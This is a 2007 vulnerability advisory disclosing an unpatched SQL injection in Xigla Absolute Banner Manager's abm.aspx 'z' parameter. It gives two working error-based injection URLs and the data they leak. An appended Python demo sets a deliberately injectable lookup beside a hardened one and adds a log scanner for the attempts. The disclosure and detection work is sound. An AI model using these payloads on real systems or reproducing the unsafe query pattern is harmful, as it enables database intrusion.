HackerSafe Labs - Security Advisory
http://www.hackersafelabs.com/

Date: 12/06/2007
Vendor: http://www.xigla.com
Package: Xigla Absolute Banner Manager
Versions: v4.0
Credit: Joseph Pierini - HackerSafe Labs
Risk:
Related Exploit Range: Remote
Attack Complexity: Medium
Level of Authentication Needed: Not Required
Confidentiality Impact: Major
Integrity Impact: Major
Availability Impact: Major

Overview:
Absolute Banner Manager .NET is a feature-packed ad tracking and banner management application developed for the webmaster looking for a scalable, flexible and reliable banner ad serving front-end tool.

Vulnerabilities:
A SQL injection vulnerability exists in the Windows version of the Xigla Absolute Banner Manager application. The "z" parameter of "abm.aspx" is used in a SQL query without validation, and the database engine's error messages are returned to the client, as the examples below show.

SQL Injection Page: "abm.aspx"
SQL Injection Parameter: "z="

Examples:
http://www.domainname.com/absolutebm/abm.aspx?z=@@version

Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ' to a column of data type int.

http://www.domainname.com/absolutebm/abm.aspx?z=1))%20and%201=convert(int,(select%20top%201%20%20convert(varchar,name)%20from%20sysobjects%20where%20xtype=char(85)))

Syntax error converting the varchar value 'dtproperties' to a column of data type int.

Resolution Timeline:
Vendor Notification: October 29, 2007 : 'info@xigla.com' 'security@xigla.com'
Vendor Response: None
Vendor Fix: None
Public release of advisory: December 6, 2007

ScanAlert Responsible Disclosure Policy
ScanAlert believes in the responsible disclosure of vulnerability information with a coordinated release with the vendor where possible. Except where active and/or trivial exploitation of the vulnerability is present, ScanAlert believes it is in the best interest of the community when the vendor participates in the process of disclosure and has sufficient time to respond effectively. If ScanAlert exhausts all reasonable means in order to contact a vendor, then ScanAlert may issue a public advisory disclosing its findings 15 business days after the initial contact.

ScanAlert's mission is to make the web safe from hackers. We make web sites secure from hackers and certify it to their customers via our patent-pending HACKER SAFE(R) security certification technology. Our daily security audits and real-time certification enable consumers to know whether the sites where they shop are taking the necessary steps to safeguard their personal information from hackers. By alleviating consumers' fears of identity theft and credit card fraud, online merchants who earn HACKER SAFE certification consistently see substantial increases in online transactions.

Joseph Pierini, CISSP | Director, Enterprise Services
ScanAlert (www.scanalert.com)
labs@hackersafe.com
877-302-9965 ext 1185
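The following is an added example, not part of the advisory and not Xigla's code, illustrating the defect class behind the "z=" finding and two things a site operator can do about it: harden the lookup and spot the attempts in web logs. It uses an in-memory SQLite table called "zones" as a constructed stand-in for the application's real (unknown) schema, and a handful of constructed log lines in a simplified IIS/W3C layout; the two tampered values in the log are the ones quoted in the advisory above.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed stand-in for whatever banner "zone" lookup sits behind abm.aspx.
# The real Absolute Banner Manager schema is not known here; this table and
# its rows are invented for the demonstration.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE zones (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO zones VALUES (?, ?)",
                     [(1, "header"), (2, "sidebar"), (3, "footer")])
    return conn

# Allow-list for the only legitimate shape of the parameter: a short integer.
ZONE_ID_RE = re.compile(r"\d{1,9}")

def lookup_zone_unsafe(conn, z):
    """The defect class the advisory describes: the raw request parameter is
    concatenated into the SQL text, so whatever is in 'z' becomes query syntax."""
    sql = "SELECT name FROM zones WHERE id = " + z
    return [row[0] for row in conn.execute(sql)]

def lookup_zone_safe(conn, z):
    """Hardened form: reject anything that is not a plain integer before the
    database sees it, then pass the value as a bound parameter instead of
    query text. Either measure alone stops the injection; together they are
    cheap defence in depth. Returning a generic error page instead of the
    engine's message (not shown) would also remove the information leak."""
    if ZONE_ID_RE.fullmatch(z) is None:
        raise ValueError("zone id must be a positive integer")
    rows = conn.execute("SELECT name FROM zones WHERE id = ?", (int(z),))
    return [row[0] for row in rows]

# Constructed log lines in a simplified W3C/IIS layout:
#   date time method uri-stem uri-query status
SAMPLE_LOG = [
    "2007-12-06 10:01:02 GET /absolutebm/abm.aspx z=3 200",
    "2007-12-06 10:01:09 GET /absolutebm/abm.aspx z=@@version 500",
    "2007-12-06 10:01:15 GET /absolutebm/abm.aspx "
    "z=1))%20and%201=convert(int,(select%20top%201%20%20convert(varchar,name)"
    "%20from%20sysobjects%20where%20xtype=char(85))) 500",
    "2007-12-06 10:02:40 GET /absolutebm/abm.aspx z=12 200",
    "2007-12-06 10:03:01 GET /absolutebm/index.aspx - 200",
]

LOG_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) (\d{3})$")

def find_injection_attempts(log_lines):
    """Return (timestamp, decoded z value, status) for every abm.aspx request
    whose 'z' parameter is not a plain integer. Because the legitimate value
    space is so narrow, an allow-list check is more reliable than enumerating
    SQL keywords; the 500 responses corroborate the hits."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        ts, _method, path, query, status = m.groups()
        if not path.lower().endswith("/abm.aspx") or query == "-":
            continue
        # parse_qs percent-decodes values and splits each pair on the first
        # '=' only, so '1=convert(...)' inside the value stays intact.
        for z in parse_qs(query, keep_blank_values=True).get("z", []):
            if ZONE_ID_RE.fullmatch(z) is None:
                hits.append((ts, z, status))
    return hits

if __name__ == "__main__":
    db = make_db()
    print("unsafe lookup, tampered input:", lookup_zone_unsafe(db, "1 or 1=1"))
    print("safe lookup, normal input    :", lookup_zone_safe(db, "2"))
    for hit in find_injection_attempts(SAMPLE_LOG):
        print("suspicious request           :", hit)
```

The unsafe lookup returns every row for the tampered input because the input has become part of the WHERE clause; the safe lookup raises before any SQL runs. The log scan flags exactly the two requests whose "z" value is not an integer, which is the check an operator can run over historical IIS logs to see whether the advisory's technique was ever used against them.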